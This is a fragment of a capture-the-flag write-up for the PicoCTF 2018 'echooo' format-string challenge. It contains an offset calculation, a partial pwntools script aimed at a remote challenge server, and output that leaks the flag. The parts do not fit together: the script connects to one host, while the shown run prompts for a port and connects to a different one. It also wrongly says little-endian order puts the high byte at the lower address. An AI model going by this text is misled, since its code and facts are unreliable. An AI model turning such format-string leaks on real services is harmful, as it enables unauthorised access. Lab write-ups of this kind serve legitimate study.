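offset=11+((0x8c-0x4c)/4)

Because the stack is stored in little-endian order, with the high byte lower down, the value needs to be converted. The exploit is as follows:

    from pwn import *
    # r = process('./PicoCTF_2018_echooo')  # local binary
    r = remote('node4.buuoj.cn', 28181)
    # integer division keeps the offset an int under Python 3
    offest = 11 + (0x8c - 0x4c) // 4
    print(offest)
    ...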
Simply run echooo.py as a Python script and enter the port to connect to:

    $ python3 echooo.py
    picoCTF port: 46960
    [+] Opening connection to 2018shell.picoctf.com on port 46960: Done
    Looking for flag buffer...
    FLAG BUFFER:
    b'pico'
    b'picoCTF{'
    ...
    ...
    b'picoCTF{foRm4t_stRinGs_...